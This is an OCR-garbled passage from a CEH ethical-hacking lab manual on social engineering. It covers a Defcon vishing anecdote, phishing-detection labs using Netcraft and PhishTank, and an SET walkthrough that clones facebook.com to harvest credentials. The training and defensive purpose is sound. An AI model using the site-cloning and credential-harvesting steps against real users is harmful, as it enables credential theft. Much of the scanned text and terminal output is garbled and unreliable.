Ceh v8 labs module 09 social engineering

CEH Lab Manual

S o c i a l E n g i n e e r i n g

M o d u l e 0 9

Module 09 - Socia l Engineering

Social EngineeringS o c ia l engineering is the a rt o f convincing peop le to re ve a l co n fid e n tia l in fo n m tio n .

L a b S c e n a r i o

Source: http:/ / monev.cnn.com/2012/08/O־־/technology־/walmart-liack- de Icon/index, htm

Social engineering is essentially the art of gaining access to buildings, systems, using ־data by exploiting human psychology, rather than by breaking 111 01 ־01technical hacking techniques. The term “social engineering” can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies 011 the trusting nature of most individuals. For example, instead of trying to find software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to tiick the employee into divulging 111s password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving 111111 information that could be used 111 a hacker attack to win a coveted “black badge” 111 the “social engineering” contest at the Deleon hackers’ conference 111 Las Vegas.

111 tins year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and 111s talent for self-effacing small talk to squeeze the following information out of Wal-Mart:

■ The small-town Canadian Wal-Mart store's janitorial contractor

■ Its cafeteria food-services provider

■ Its employee pay cycle

■ Its staff shift schedule

■ The time managers take then־ breaks

■ Where they usually go for lunch

■ Type of PC used by the manager

■ Make and version numbers of the computer's operating system, and

■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken 111 to the extent of coughing up so much scam-worthy treasure.

Calling from 111s sound-proofed booth at Defcon MacDougall placed an “urgent” call, broadcast to the entire Deleon audience, to a Wal-Mart store manager 111 Canada, introducing liinisell as "Gan־ Darnell" from Wal-Mart's home office 111 Bentonville, Ark.

I C O N K E Y

/ V a lu a b le in fo rm a t io n

^ Test your

*5 W eb exercise

£ Q Workbook revie

Ethical Hacking and Countenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.]

C EH Lab Manual Page 675

http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-


The role-playing visher (visliing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract.

“Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations.

But first, he told the store manager, he needed a thorough picture of how the store operated.

111 the conversation, which lasted about 10 minutes, “Darnell” described himself as a newly lured manager of government logistics.

He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton of cash off it,” he said, then went on to talk about his upcoming visit, keeping up a “steady patter” about the project and life 111 Bentonville, Crowley writes.

As if tins wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey 111 preparation for 111s upcoming visit.

The compliant manager obliged, plugging the address into 111s browser.

When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting 111s well-earned applause, MacDougall became the first Capture the Flag champion to capture even״ data point, or flag, on the competition checklist 111 the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers are verboten, given that Defcon has no great desire to bring the law down on its head.

Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as ]MacDougall pulled down Wal-Mart's pants.

MacDougall said, “Companies are way more aware about their security. They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break 111 these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.”\

MacDougall also shared few best practices to be followed to avoid falling victim to a social engineer:

■ Never be afraid to say no. If something feels wrong, something is wrong

■ An IT department should never be calling asking about operating systems, machines, passwords or email systems—they already know

Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.]



■ Set up an internal company security word of the day and don’t give any information to anyone who doesn’t know it

■ Keep tabs 011 what’s 011 the web. Companies inadvertently release tons of information online, including through employees’ social media sites

As an expert e th i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you should circulate the best practices to be followed among the employees.

L a b O b j e c t i v e s

The objective of this lab is to:

■ Detect phishing sites

■ Protect the network from phishing attacks

To earn* out diis lab, you need:

■ A computer nuuiing Window Seiver 2012

■ A web browser with Internet access

L a b D u r a t i o n

Time: 20 Minutes

O v e r v i e w S o c i a l E n g i n e e r i n g

Social engineering is die art of convincing people to reveal confidential information. Social engineers depend 011 the fact that people are aware of certain valuable information and are careless 111 protecting it.

L a b T a s k s

Recommended labs to assist you 111 social engineering:

■ Social engineering

■ Detecting plusliuig using Netcraft

■ Detecting phishing using PliishTank

L a b A n a l y s i s

Analyze and document the results related to the lab exercise. Give your opinion 011 your target’s security posture and exposure.

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .

& T o o l s d e m o n s tr a te d in th is la b a r e a v a ila b le in D:\CEH- T ools\C E H v8 M odule 09 S o c ia l E n g in ee rin g

» T A S K 1

O verv iew

Ethical Hacking and Countemieasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.]



Delecting Phishing Using NetcraftN e trm ftp ro vid e s n eb se׳ rve r an d n eb hosting׳ w arket-sh are an a lysis, in clu d in g n'eb

se rve r an d op erating system detection.


By now you are familiar with how social engineering is performed and what sort ot information can be gathered by a social engineer.

Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies.

Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity 111 an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, 01־ IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing 01־ instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forger\T. The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the plusher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller- ID data to give the appearance that calls come from a trusted organization.

Since you are an expert e th i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you must be aware of phishing attacks occurring 011 the network and implement anti- phishing measures. 111 an organization, proper training must be provided to people to deal with phishing attacks. 111 this lab you will be learning to detect phishing using Netcraft.

I C O N K E Y

/ Valuable information

v Test vour.״*־

*a W eb exercise

f f i! Workbook revi!





Tins kb will show you phishing sites using a web browser and show you how to use them. It will teach you how to:


■ Protect the network from phishing attack

To carry out tins lab you need:

■ N e tc r a f t is located at D :\C E H -T ools\C E H v8 M o d u le 09 S o c ia l E n g in e e r in g \A n ti-P h ish in g T o o lb a r \N e tc ra f t T o o lb a r

■ You can also download the latest version of N e tc r a f t T o o lb a r from the link http://toolbar.netcralt.com/

■ If you decide to download the l a t e s t v e r s io n , then screenshots shown 111 the lab might differ

■ A computer running Windows Server 2012

■ A web browser (Firefox, Internet explorer, etc.) with Internet access

■ Administrative privileges to run the Netcraft toolbar


Time: 10 Minutes

O v e r v i e w o f N e t c r a f t T o o l b a r

Netcraft Toolbar provides In te rn e t s e c u r i ty s e r v ic e s , including anti-fraud and anti-phishing services, a p p lic a tio n te s t in g , code reviews, automated penetration testing, and r e s e a r c h d a ta a n d a n a ly s is on many aspects of the Internet.

L a b T a s k s

1. To start this lab, you need to launch a web browser first. 111 this lab we have used M ozilla F ire fo x .

2. Launch the S ta r t menu by hovering the mouse cursor on the lower-left corner of the desktop.

^ ~ T o o ls d e m o n s tr a te d in th is la b a r e a v a ila b le in D:\CEH- T ools\C E H v8 M odule 09 S o c ia l E n g in ee rin g

^ T A S K 1

A nti-P h ish ing Tool b a r



http://toolbar.netcralt.com/


JL״5

* | Windows Server 2012!m i 2012 RcIcak CanJiaatr Dot*c«nv-

tiftlmHon copy BwO MW

Q= JYou cau also download the Netcraft toolbar formhttp://toolbar.11etcraft.com

F IG U R E 1.1: Windows Server 2012-Start Menu

3. Click the M ozilla F ire fo x app to launch the browser.

F IG U R E 1.2: Windows Server 2012-Start Menu Apps view

4. To download the N e tc r a f t T o o lb a r for M ozilla F ire fo x , enter http:// toolbar.11etcraft.com 111 the address bar of the browser or drag and drop the n e tc r a f t_ to o lb a r -1.7-fx .x p i file 111 Firefox.

5. 111 tins lab, we are downloading the toolbar from the Internet.

6. 111 Firefox browser, click D o w n lo a d th e N e tc r a f t T o o lb a r to install asthe add-on.

SIN G LEH 3P ■ן n , ,

^ ןזח

ת etc M i f t

M»tc׳-»ft Tool bar

■׳ •

Why utt יש• N«tcraft Toolbar?

U Protect your taviitQf from I'hMhtnq attack*, a see the hoittnq tot at) or 1 and Htefc Mataiq 01 e< O Help defend tt*c Internet commu׳«lty trooi Ira

F IG U R E 1.3: Netcraft toolbar downloading Page

Netcraft provides Internet security services, including anti-fraud and anti-phishing services.



http://toolbar.11etcraft.com

http://toolbar.11etcraft.com


7. On the In s ta l l page of the Netcraft Toolbar site, click the F ire fo x im a g e to continue with installation.

fc 4 c P f t O l

1nETCI AFT

Download Now .■).,־«״

Netcraft Anti Phithing Toolbar

&[QQ Netcraft is an

System Raqulramanla

F IG U R E 1.4: Netcraft toolbar Installation Page

8. Click A llow to download Netcraft Toolbar.

^ t*dth« at ■10c*«.ne<r<ft <om) Id<ti׳ye.e »סי«*ז SNGLEH2r

1 -־- ■1

Teotbir Download Now

N*te«H Antl-PN«hl0<׳ Todhtr

Systam Kaquirtmanti>r>a*pl«tfc#rre (AMnn/HMnji)

r=rs a'oolba• <uppor׳

« cwitnn rva>« <e>$1cns or the tootta r«r ar» orte bw t« 1 nxdrg ««>« tuw « ooea. and varan

roMom• inat«llinQ? fm• ••id ־tr ...l.ll.l.״־« also ha»» i 8rt«t1«n 0» tutofwis < you w1« to g«t t*e m«t oa tf »• 1wanrt toofcx

Help & Support

F IG U R E 1.5: Netcraft toolbar Installation-Allow button

9. When the S o f tw a r e In s ta l l a t io n dialog box appears, click In s ta l l N ow .

Software Installation

Install add-ons only from authors whom you trust.

Malicious software can damage your computer or violate your privacy.

You have asked to install the following item:

Netcraft Anti-Phishing Toolbar (Netcraft Ltd)http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi

Install Now Cancel

F IG U R E 1.6: Installing Netcraft Toolbar

10. To complete the installation it will ask you to restart the browser. Click R e s ta r t N ow .

Internet services company based in Bath, England.

£ Q Netcraft Toolbar provides a wealth of information about the sites you visit.



http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi


■ A• <o not (ifTcntt/ K H• p & Support

• l*1gUHnImlnilMiu11׳l׳ «w ■■•I iui InilaMu• *MrM •יAo jlec h1v« jMlaclKMx/ iito ijit tf you •it «0 with* non <ut019 י M toabJt• o«t 1 Oimmh'it >n<v M «n1w4r«d n air MtUhMOir (juMOtm

F IG U R E 1.7: Restarting Firefox browser

11. N e tc r a f t T o o lb a r is now visible. Once the T o o lb a r is installed, it looks similar to the following figure.

p * ם -

J1\U---- >«rw • t SatejtfuaitontiltiOflC1*11

F IG U R E 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays 111 the Toolbar (unless the page has been blocked): R isk r a t in g , R an k , and Flag .

13. Click S ite R e p o r t to show the report of the site.

F IG U R E 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a pliishing page by Netcraft Toolbar you will see a w a rn in g d ia lo g that looks similar to the one in the following figure.

15. Type, as an example:http: / / www.pavpal.ca.6551 .secure7c.mx / images / cgi.bin

l.__ Risk Rating displays thetrustworthiness of die current

0=5! Site report links to : detailed report for die




F IG U R E 1.10: Warning dialog for blocked site

16. If you trust that page click Y e s to open it and if you don’t, click No (R e c o m m e n d e d ) to block that page.

17. If you click N o the following page will be displayed.

£ 0 . Phishing a site feeds continuously updated encrypted database of patterns diat match phishing URLs reported by the Netcraft Toolbar.

Klnl א- 4 c Coofb fi ft C-

PhKMng S*o Hlockcxl .!■!•!!ר!■

%lll t־־»

... - : m ; .

L ■FIG U R E 1.11: Web page blocked by N etcraft Toolbar


Document all die results and report gathered during die lab.

Tool/Utility Information Collected/Objectives Achieved

Netcraft ■ Phishing site detected


Q u e s t i o n s

1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.




2. Determine it you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?

3. How can you stop the Toolbar warning if a site is trusted?

Internet Connection Required

Platform Supported

0 Classroom

□ N<

□ !Labs




3Detecting Phishing Using PhishTankP h ish T a n k is a co llab o ra tive clearinghouse fo r d ata an d in fo rm atio n regard ing

p h ish in g on the In te rn e t.


Phishing is an attempt by an individual 01־ group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization 01־ known individual. These emails often attempt to entice users to click 011 a link that will take the user to a fraudulent website that appears legitimate. Hie user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code.

With the tremendous increase 111 the use of online banking, online share trading, and ecommerce, there has been a corresponding growth 111 the incidents of phishing being used to carry out financial frauds. Phisliing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details etc.) by masquerading as a masted entity.

111 the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been sent from 111s bank. The email urges the victim to click 011 the link 111 the email. When the victim does so, he is taken to “a secure page 011 the bank’s website.” The victim believes the web page to be authentic and he enters 111s user name, password, and other information. 111 reality, the website is a fake and the victim’s information is stolen and misused.

Being an administrator 01־ penetration tester, you might implement all the most sophisticated and expensive technology solutions 111 the world; all of it can be bypassed if your employees fall for simple social engineering scams. It become

I C O N K E Y

Valuable information_____

T e s t yo u r * .־>

gfe Web exercise

W orkbook r׳e־\




your responsibility to educate employees 011 best practices for protecting information.

Phishing sites 01־ emails can be reported to [email protected]

http: / /www.us-cert.gov/ 11av/report ph1sh111g.html

US-CERT (United States Computer Emergency Readiness Team) is collecting phishing email messages and website locations so that they can help people avoid becoming victims of phishing scams.

L a b O b j e c t i v e s[C TTools d e m o n s tr a te d in th is la b a r e a v a ila b le in D:\CEH- Tools\C E H v8 M odule 09 S o c ia l E n g in ee rin g

This lab will show you how to use phishing sites using a web browser. It will teach you how to:


■ Protect the network from phishing attacks

L a b E n v i r o n m e n t

To carry out the lab you need:

■ A computer running Windows Server 2012

■ A web browser (Firefox, Internet Explorer, etc.) with Internet access


Tune: 10 Minutes

O v e r v i e w o f P h i s k T a n k

£ Q PhishTank URL: PhishTank is a f r e e c o m m u n ity s i t e where anyone can submit, verity, track, andhttp.//www.phishtank.com s!1are p h ish in g d a ta . PhishTank is a collaborative clearing house for data and

information regarding phishing 011 the Internet. Also, PhishTank provides an o p e n API tor developers and researchers to integrate anti-phishing data into their applications at 110 charge.

L a b T a s k s

1. To start this lab you need to launch a web browser first. 111 this lab we have used M ozilla F ire fo x .

2. Launch the S ta r t menu by hovering the mouse cursor 011 the lower-left corner of desktop.

m. T A S K 1

P h ish T a n k



mailto:[email protected]

http://www.us-cert.gov/

http://www.phishtank.com


jw

$

23 Windows Server 2012Wndowa icrrct 2012 IUIe.m C«>vl!uatr 0*t»c«n*

kialualon copy Hu!a MW׳

- g • *faF IG U R E 2.1: Windows Server 2012-Start Menu

3. Click the M ozilla F ire fo x app to launch the browser.

F IG U R E 2.2: Windows Server 2012-Start Menu Apps view

4. Type h ttp : / /w w w .p h is h ta n k .c o m 111 the address bar of the web browser and press E n te r .

ing5. You will see the follow־׳

P h i s h T a n k ־ ״ ״ . י . .

Jo in tie fiylitayaiittt ptiialiiiKjSutomrtstspsdgdphshes Track the Uatis of your suhmfyaons Verfy <A\cr jsen' submaaton. Develop software with our free API.

Recert Subnissbrs

1S7:£S1 rtnJ «r»n iTKrsfjn n.’iTVMet/ieya'Aijaaa-*®:/VrstM.axVsy

lPiOO *rt>-r tom

lg liia rtc usemncs.aebfu.ictscmnsraurAxroim

m.cvn’PM/iMlct.Kni

£01 PlushTaiik provides an open A P I for developers and researchers to integrate anti- phishing data into dieir applications at no charge.

F IG U R E 2.3: Welcome screen of PhishTank



http://www.phishtank.com


6. Type the w e b s i t e URL to be checked for phishing, for example, http: / / sdapld21 .host21 .com.

7. Click Is it a p h is h ? .

*MhTink provttet »׳ oh״ An tar

Jo in the fight against phishingSubmrt tuwc»d phsftua. ־Rack the ttatic of 1/cur submissions Vecfyoher jscts suonssnns Develop software wim our ftee API.

j rttp //KiJptaV. ItMtUcem

R#c*r< SubTKSors■ dim) fjst) lu > mi ft LImm »u»p«>.le0 pirn

' ImiTVl. J4CIUY...

PliishTauk 1s operated by Open D N S to improve the Internet through safer, faster, and smarter DNS.

F IG U R E 2.4: Checking for site

If the site is a p h is h in g s i t e , you see the following warning dialog box.

PhishTank Ok of it* NM.i«o*MTw*

Submission #1571567 is aimentty ONLINE

S01 n or Hcgcto׳ to vert, t !6 sutxnssior.

No screenshot yetWe have not ye! successfully taken a screeasltol •f the submitted website.

F IG U R E 2.5: Warning dialog for phishing site


Document all die websites and verify whether diey are phishing sites.

0 2 Open D N S isinterested in having die best available information about phishing websites.

Tool/Utility Information Collected/Objectives Achieved

PhiskTank ■ Phishing site detected





Q u e s t i o n s

1. Evaluate what PhishTank wants to hear about spam.

2. Does PhishTank protect you from phishing?

3. Why is Open DNS blocking a phish site that PhishTank doesn't list or has not vet verified?

Internet Connection Required

0 Yes

Platform Supported

0 Classroom

□ No

□ !Labs




3Social Engineering Penetration Testing using Social Engineering Toolkit (SET)T he S o c ia /E n g in e e r T o o /k it (S E T ) is an open-source ־Pyth o n -d riven to o l aim ed a t

p en e tra tio n testin g aro u n d so c ia l eng ineering

■ c o n k e y L a b S c e n a r i o

Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies even־ day. Even though there are many hacking tools available with underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-pliishing attacks, website attacks, etc. Attackers can draft email messages and attach malicious files and send them to a large number of people using the spear-pliishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/ Tabnabbing, etc. all at once.

Though numerous sorts ot attacks can be performed using tins toolkit, tins is also a must-liave tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily witlun the security community.

As an e th i c a l h a c k e r , penetration tester, or s e c u r i ty a d m i n i s t r a t o r youshould be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities 011 the network.


The objective of tins lab is to help sUidents learn to:

■ Clone a website

■ Obtain user names and passwords using the Credential Harvester method

■ Generate reports for conducted penetration tests

£__ Valuableinformations Test yourknowledge

Web exercisemWorkbook review




L a b E n v i r o n m e n t

To earn’ out die kb, you need:

■ Run this tool 111 B a c k T ra c k Virtual Machine

■ Web browser with Internet access

■ Administrative privileges to mn tools


Tune: 10 Minutes

O v e r v i e w o f S o c i a l E n g i n e e r i n g T o o l k i t

Sockl-Enguieer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. The (SET) is specifically designed to perform advanced attacks against die human element. The attacks built into die toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

L a b T a s k s

1. Log in to your B a c k T r a c k virtual machine.

2. Select A p p lic a t io n s ־־ B a c k T r a c k ־־ E x p lo i ta t io n T o o ls ־־ S o c ia l E n g in e e r in g T o o ls ־־ S o c ia l E n g in e e r in g T o o lk it and click S e t.

& T o o ls d e m o n s tr a te d in th is la b a r e a v a ila b le in D:\CEH- T ools\C EH v8 M odule 09 S o c ia l E n g in ee rin g

T A S K 1E x e c u te S o c ia l

E n g in ee rin g T o o lk it

3 Tue Sep 25. 7:10 PM Applications[ Places System [>7]

a9 BEEF XSS Framework

9 HoneyPots

11• Social Engineering Toolkit

f * Network Exploitanor Tools.-

Web Exploitation Tools

^ Database Exploitation Tools Wireless Exploitation Tools

|9 Social E’ jifM

Physical Exploitation

3\ Open Source Exploited ,h setי

|Q Information Gathering r■ vulnerability Assessment J 0 Exploitation Tools

Privilege Escalation Ef Maintaining Access ^ Reverse Engineering I RFIDTOols O

Forensic!*

KCporting Tools

( P services

y Miscellaneous

<< back track

F IG U R E 3.1: Launching SET in BackTrack

C EH Lab Manual Page 691 Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.]


3. A T e rm in a l window for SET will appear. Type y and press E n te r to agree to the terms of service.

File Edit View Terminal Help

THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above l ic e n s in g was ta ke n from th e BSD l ic e n s in g a n d ^ is a p p lie d to S o c ia l-E ng in e e r T o o lk i t as w e l l . ___ " * ^ 1

Note th a t th e S o c ia l-E n g in e e r T o o lk i t i s p ro v id e d as i s , and i s 3 r o y a lt y f re e 0 p e n -so u rce a p p l ic a t io n . M r

F ee l f re e to m o d ify , use, change, m a rke t, do w h a te ve r § u want w i th i t a f lo n g a s you g iv e th e a p p ro p r ia te c r e d i t where c r e d i ti s due (w h ich means g iv in g th e a u th o rs th e c r e d i t th e y ife s e rv e f o r w r i t i n g i t ) . A lso n o te th a t by u s in g t h is s o f tw a re , i f you e ve rsee th e c r e a to r o f SET in a b a r , you a re re q u ire d to g iv e him a hug and buy hima b e e r. Hug must la s t a t le a s t 5 seconds. A u th o rh o ld s th e r ig f t t to re fipse th e hug o r th e b e e r .■ f | ן ^ \ \

f l o t 'B k i l . I f y o u \a re

1 \J ou a׳ re v io la ttin q Xn a ty o u w i l l o n ly us

T ^ ^ * c M 1 - E t l ^ e e r T A lk i t W s r y T ig f l f i j p y e l y good pn<r J t a ^ op I ^ S 4a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c

n W c r a th O T f t f l b ^ th e l:o m p a n y *y m j a r e ^ re r fO T l l™ a ^ e s s « e r r ^ in g th e te rm s o f s e r v ie and l ic e n s e o f t h is t o o ls e t . B^ r t yes ( o n ly one t im e ) , you agree to th e te rm s o f s e rv ic e a n d T e t h is t o o l f o r la w fu l purposes o n ly .

F IG U R E 3.2: SET Service Agreement option

4. You will be presented will a list of menus to select the task. Type 1 and press E n te r to select the S o c ia l -E n g in e e r in g A t ta c k s option.


Homepage: h ttp s : / /w w w .tru s te d s e c .c o m [

Welcome to th e S o c ia l-E n g in e e r T o o lk i t (S E T J j.Y o u r one s to p shop f o r a l l o f y o u r s o c ia l- e n g in e e r in g n e e d s .^ ,

J o in us on ir c . f r e e n o d e .n e t in chan ne l # s e « J o lk i t

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trusted5ec.com

S e le c t from th e menu:

J 1) S o c ia l-E n g in e e r in g A t ta c k s I _2) F a s t-T ra c k P e & t r a t io n T e s t in g 3 T י h ird p .n rty M odules4) Update th e M e ta s p lo it S rane i/o rk5 ) Update th e S o c ia l-E n g in e e r T o o lk i t6) Update SET c o n f ig u ra t io n7) H e lp , C r e d its , and About

99) E x i t th e S o c ia l-E n g in e e r T o o lk i t

F IG U R E 3.3: SET Main menu

5. A list of menus 111 Social-Enguieermg Attacks will appear; type 2 and press E n te r to select W e b s i te A t ta c k V e c to rs .

f f is E T has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.

£ Q Th e web jacking attack׳is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site.

f f is E T allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.



https://www.trustedsec.com

https://www.trusted5ec.com


« T e rm in a l


J o in us on ir c . f r e e n o d e .n e t in chan ne l # s e to o lk 1 t

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

S e le c t from th e menu:

1) S p e a r-P h is h in q A t ta c k Vec to rs | 2) W ebs ite A t ta c k V e c to rs |3) In fe c t io u s Media G ene ra to r4) C re a te a Payload and L is te n e r

_ 5) Hass M a ile r A t ta c k ן _I 6) A rdu ino -B ased A t ta c k v e c to r g|^ % S M S S p o o fin g A tta c k V e c t o r ♦ ^ I A

8) W ire le s s Access P o in t A t ta c k V e c to r9 ) QRCode G e ne ra to r A t t a c | V e c to r10) P o w e rsh e ll A t ta c k V e c t l r s11) T h ird P a rty Modules

99) R e tu rn back to th e main menu.

>r5s____________________________________________________

a c k

U

1) Java A p p le t A t ta c k Method2) M e ta s p lo it Browser E x p lo i t Method

I 3) C re d e n tia l H a rv e s te r A tta c k Method |4) Tabnabbing Attack Method5) Man l e f t in th e M id d le A t ta c k Method6) Web Jack ing A tta c k Method7) M u lt i - A t ta c k Web H e th o l8) V ic t im Web P r o f i l e r9) C rea te o r im p o rt a CodeS igning C e r t i f ic a t e

99) R e tu rn to Main Menu

s e t :w ebattack j3B1

F IG U R E 3.4: Social Engineering Attacks menu

6. 111 the next set of menus that appears, type 3 and press E n te r to select the C re d e n tia l H a r v e s te r A tta c k M e th o d


and th e B a ck |T rack team. T h is method u t i l i z e s !fra m e rep lacem ents to make th e h ig h lig h te d URL l i n k to appear le g it im a te however *tf1en c lic k e d a window pops up then i s re p la ce d w i th th e m a lic io u s l i n k . You can e d i t th e l i n k rep lacem ent s e t t in g s in th e s e t^c o n F ig i f i t s to n fc *k o « /fa s t.

The M u lt i - A t ta c k method w i l l add a co m b in a tio n o f a t ta c k s th ro u g h th e web a t ta c k J r

menu. For example you can u t i l i z e th e Java A p p le t , M e ta s p lo it B row ser, C re d e n tia l H a rve s te r/T a b n a b b in g , and th e Man L e f t in th e M id d le a t ta c k a l l a t once to see w h ich i s s u c c e s s fu l. m .

F IG U R E 3.5: website Attack Vectors menu

7. Now, type 2 and press E n te r to select the S ite C lo n e r option from the menu.

C Q t i! e Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web- based attacks in order to compromise the intended victim.

0 3 Th e Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all die information posted to die website.



https://www.trustedsec.com


« T e rm in a l


9) C re a te o r im p o r t a CodeS ign ing M

99) R e tu rn to Main Menu

s e t : w e b a tta c k >3

The f i r s t method w i l l a l lo w SET to im p o r t ׳ '!* l i s t o f p re -d e f in e d web a p p lic a t io n s th a t i t can u t i l i z e w i th in th e a t ta c k .

The second method w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r choos ing and a l lo w you to u t i l i z e th e a t ta c k v e c to rs w i th in th e c o m p le te ly same web a p p l ic a t io n you were a t te m p t in g to c lo n e .

I h e t h i r d method aU ow s y o u jto im p o r t yo u r own w e b s ip ;, n o te t ^ a t you Shou ld o n ly have a lt' in d e x .h tm l when u s in g th e im p o r t W ebs itefunctionality^^* Y jF ♦ ^ I V י ׳ / (•

1) Web Tem pla tes v I ^ 3 412) S i te C lo n e r ! I \

3) Custom Im p o rt - ״»■

99) R e tu rn to W ebattack Menu

;e t:w e b a tta c k a E f|_______________

C Q t 11 e Site Cloner is used to done a website of your choice.

F IG U R E 3.6: Credential Harvester Attack menu

Type the IP a d d r e s s of your BackTrack virtual PC 111 the prompt lor IP a d d r e s s fo r th e P O S T b a c k in H a rv e s te r /T a b n a b b in g and press E n te r .111 tins example, the IP is 10.0.0.15

*

* T e rm in a l


a p p lic a t io n s th a t i t can u t i l i z e w i th in th e a t ta c k .

The second method w i l l c o m p le te ly c lo n e a w e b s ite o f y o u r choo s ing and a l lo w you to u t i l i z e th e a t ta c k v e c to rs w i th in th e c o m p le te ly same web a p p l ic a t io n you were a t te m p t in g to c lo n e .

The t h i r d method a llo w s you to im p o r t y o u r own w e b s ite , n o te t h a t you shou ld o n ly have an in d e x .h tm l when u s in g th e im p o r t w e b s ite f u n c t i o n a l i t y .

1) Web Tem pla tes2) S i te C lo n e r3) Custom Im p o rt _ '

1 9 9 ) R e tu rn to W e b A ta ck Menu I / . * | ^

J[jLS ir br r־ 3t -1 C re d e n tia l h a rv e s te r w i l t a l lo w you to u t i l i z e th e c lo n e c a p a b i l i t ie s w i th inset ן J

[ -1 t o h a rv e s t c r e d e n t ia ls o r pa ram e te rs from a w e b s ite as w e ll as p ie c e them in to a r e p o r t[-1 T h is o p t io n i s used f o r what IP th e s e rv e r w i l l POST t o .[ - J I f y o u 'r e u s in g an e x te rn a l IP , use yo u r e x te rn a l IP f o r t h is

: > IP address for the POST back in Harvester/Tabnabbina:110.0.0.1s|

F IG U R E 3.7: Providing IP address in Harvester/Tabnabbing

Now, you will be prompted for a URL to be cloned, type the desired URL for E n te r t h e u rl to c lo n e and press E n te r . 111 tins example, we have used w w w .f a c e b o o k .c o m . Tins will nntiate the cloning of the specified website.

COS t 11 e tabnabbing attack mediod is used when a victim has multiple tabs open, when the user clicks die link, die victim w ill be presented with a “Please wait while the page loads” . When the victim switches tabs because he/she is multi-tasking, die website detects that a different tab is present and rewrites die webpage to a website you specify. The victim clicks back on the tab after a period of time and diinks diey were signed out of their email program or their business application and types the credentials in. When the credentials are inserts, diey are harvested and the user is redirected back to the original website.



http://www.facebook.com


* T e rm in a l


and a l lo w you to u t i l i z e th e a t ta c k v e c to rs w i t h in th e c o m p le te ly same web a p p l ic a t io n you were a t te m p t in g to c l o n e T ^ ^ ^ ^ ^ ^ ^

The t h i r d method a llo w s you to im p o r t -y m jr own w e b s ite , n o te t h a t you shou ld o n ly have an in d e x .h tm l when u s in g th e im p o r t w e b s ite f u n c t i o n a l i t y .

u t i l i z e th e c lo n e c a p a b i l i t ie s w i t h i r

1) Web Tem pla tes2) S i te C lo n e r3) Custom Im p o rt


: w e b a tta ck>2 —

